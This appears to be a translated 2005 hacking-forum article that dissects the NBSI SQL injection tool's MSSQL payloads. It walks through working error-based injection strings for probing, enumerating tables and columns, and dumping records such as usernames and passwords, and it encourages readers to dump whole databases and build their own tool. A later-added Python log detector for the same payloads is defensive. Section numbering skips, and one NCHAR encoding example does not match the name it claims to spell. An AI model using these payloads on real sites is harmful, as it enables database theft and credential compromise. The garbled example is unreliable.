NBSI injection analysis trace report: the MSSQL article - vulnerability warning - the black bar safety net

2005-12-28T00:00:00
ID MYHACK58:6220055876
Type myhack58
Reporter Anonymous
Modified 2005-12-28T00:00:00

Description

Preface:

Writing a good tool is not easy, and writing an injection tool is not easy either. This article traces NBSI's injection process to analyse the testing ideas of its author. Tracing and analysing how a rival tool probes is very helpful, and carefully tracing NBSI's probing results is a real treat for anyone studying injection attacks.

First, we found an IT site to test on. The purpose of the test is only to trace NBSI's probing approach, not to do any malicious damage to the site!

1 Detecting the injection point

Assume the injection point is: http://www.xxx.com/zhuru.asp?id=1

NBSI then probes this connection first: http://www.xxx.com/zhuru.asp?id=1 and user%2bchar(124)>0

At first I did not understand why char(124) is called here; this value is actually the "|" character. We will come back to it later.

Naturally this causes an IIS error, which returns the 500 internal error code; perhaps the author uses this as the basis for detection.

3 Guessing the table name

Tracing showed that the author uses a single statement to guess a whole table name, which is indeed very efficient. The specific table-name guessing code is:

And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0

See the 1 (shown in red in the original)? This is the index of the table whose name is being guessed. For the first table it is of course 1; for the second table change the 1 to 2, and so on.

So how do we decide that table-name guessing is finished? Simple: tracing shows that as soon as table index X and table index X+1 return the same table name, the guessing is complete.

5 Guessing the column name

Tracing showed that the author also uses a single statement to guess a whole column name. Perhaps this is the benefit of guessing against MSSQL! With Access it may have to be guessed letter by letter. The specific column-name guessing code is:

And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)) Order by colid) T Order by colid desc)>0

See the 1 (red in the original)? It indicates the sequence number of the column name being guessed. Change it to 2 to guess the second column name. The end is determined the same way as for table names.

Note:

NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)

To bypass the restriction on the ' character, the author uses NCHAR to build the table name as a string. The sequence above actually represents the table name as a string; the number inside each pair of parentheses is the ASCII code of one character.

Example:

If we need to guess the table name xfiletd, we only need to use the HUIE plug-in's conversion and click OK!

See the following figure (HUIE conversion result; image not reproduced):

We got the following characters:

nchar(78)%2bnchar(66)%2bnchar(69)%2bnchar(6C)%2bnchar(65)%2bnchar(74)%2bnchar(75)

Ha, fast!

6 Guessing the data

Below we look at how NBSI guesses the data; strictly speaking this should be called "dumping" (the original's term is "storm"). Let us see how the expert dumps data.

1 Get the record count of the field

And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20Where%201=1)>0

News_Style (red in the original) stands for the table name we guessed; here the author uses a common dumping trick. The record count we obtain is an INT value, so comparing it with 0 raises no type-conversion error; in other words the count is not "forced out" by itself. If, at the moment of comparing with 0, we first concatenate it with char(97) (the character a), the result becomes a string, and comparing that with zero dumps out a value of the form "record count" followed by a. Now we understand why the first probing step appended a "|" symbol. The mystery is solved.


2 Get the field value

Having obtained the record count, we continue looping to dump the field values. Here the author uses no peculiar tricks. The author's code is:

And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName) T Order by sName desc)>0

News_Style (red in the original) needs no further explanation; it is the guessed table name. The 9 (green in the original) means the 9th record of the sName field is fetched. Loop a few times, and the data is in hand.

Everyone take note of char(124). Its purpose is once again to convert the data to a string so that the comparison with an INT forces the data out, exactly as described before! This is why the field values NBSI obtains end in a "|"; the author was perhaps too lazy to strip it. :-)


See? There is a "|" symbol at the end.

3 Guessing two or N fields at once

You may feel that NBSI guesses field values very quickly; tracing and analysing it shows it is indeed good. Suppose we want to guess two field values of a table. How do we write the code?

NBSI writes it this way:

The first step is still to get the record count as in 1). The second step uses:

And (Select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (Select Top 1 UserName,PassWord From [News_User] Where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord, desc)>0


(Note that the | symbol separates the two values.)

News_User is the table name, and char(124) I will not explain again. Everyone can follow the pattern and compare the statement above with the statement in 2. Anyone with a basic grasp of SQL functions can see how the author dumps multiple field values at once. If you like, dumping all values in the database at once is no problem. An indirect reminder here: the network cost of dumping one field's value differs little from the cost of dumping all of them, so next time you use NBSI remember to select all the values at once!
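From the defender's side, the trace above (sections 1, 3, 5 and 6) gives a web-server log reviewer a fixed sequence of payload shapes to look for. The following is an added example, not code from the original article or from NBSI: it URL-decodes constructed IIS-style log lines, flags each step of that sequence, and decodes an NCHAR()/CHAR() concatenation into the object name it spells. The log lines and the signature labels are my own construction.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (method, URL, status); not from the article.
SAMPLE_LOG = [
    "GET /zhuru.asp?id=1 200",
    "GET /zhuru.asp?id=1%20and%20user%2bchar(124)>0 500",
    "GET /zhuru.asp?id=1%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))"
    "%20from(Select%20Top%201%20id,name%20from%20sysobjects%20Where%20xtype=char(85)"
    "%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 500",
    "GET /zhuru.asp?id=1%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))"
    "%20from%20(Select%20Top%201%20colid,name%20From%20syscolumns%20Where%20id%20="
    "%20OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)"
    "%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114))%20Order%20by%20colid)"
    "%20T%20Order%20by%20colid%20desc)>0 500",
    "GET /zhuru.asp?id=1%20And%20(Select%20Cast(Count(1)%20as%20varchar(8000))"
    "%2Bchar(97)%20From%20[News_Style]%20Where%201=1)>0 500",
]

# One signature per step traced above, matched against the URL-decoded,
# lower-cased, whitespace-collapsed query string.
SIGNATURES = [
    ("probe", r"\buser\s*\+\s*char\(124\)\s*>\s*0"),
    ("table-name", r"from\s+sysobjects\s+where\s+xtype\s*=\s*char\(85\)"),
    ("column-name", r"from\s+syscolumns\s+where\s+id\s*=\s*object_id\("),
    ("record-count", r"count\(1\)\s+as\s+varchar\(8000\)\)\s*\+\s*char\(97\)"),
    ("field-dump", r"isnull\(cast\(\[[^\]]+\]\s+as\s+varchar\(8000\)\),"
                   r"\s*char\(32\)\)\s*\+\s*char\(124\)"),
]

# Two or more char()/nchar() calls joined by '+': the quote-free spelling of an
# object name shown above. The \b keeps varchar(8000) from matching.
CHAR_RUN = re.compile(r"\bn?char\(\d+\)(?:\s*\+\s*\bn?char\(\d+\))+", re.I)

def decode_char_runs(sql):
    """Return each char()/nchar() concatenation as the string it spells."""
    return ["".join(chr(int(c)) for c in re.findall(r"\d+", m.group(0)))
            for m in CHAR_RUN.finditer(sql)]

def analyze_request(log_line):
    """Decode one log line's query; report matched signatures and names."""
    url = log_line.split()[1]
    # unquote_plus turns '+' into space, so a real '+' must arrive as %2B.
    sql = re.sub(r"\s+", " ", unquote_plus(url.partition("?")[2])).lower()
    return {"hits": [name for name, pat in SIGNATURES if re.search(pat, sql)],
            "names": decode_char_runs(sql)}

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        print(n, analyze_request(line))
```

The decoded object name tells the reviewer which table the column-name step was aimed at, which is what the server-side error text would otherwise have leaked.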

Summary: friends who can write their own VB code can, based on the results of our analysis, write a program and have an NBSI of their own. Today's HUIE already has this feature.

Afterword:

The most important thing in writing a program is the programming idea; what you have just seen are only some details of a well-written program. We have been wondering: how does NBSI judge whether a site is injectable? In fact, relying on a single SQL error dump is just one idea. The two ideas NBSI shows us are:

2 Judging by the IIS status header: a normal return of 200, 101 is the baseline; a 500 return indicates that an error has occurred.

3 Judging word by word against the information IIS returns, then comparing to see whether injection is possible! Because some websites return very large amounts of HTML, this judgement is very time-consuming and is not recommended.

There is more that we still need to learn, not only dumping the library but doing the injection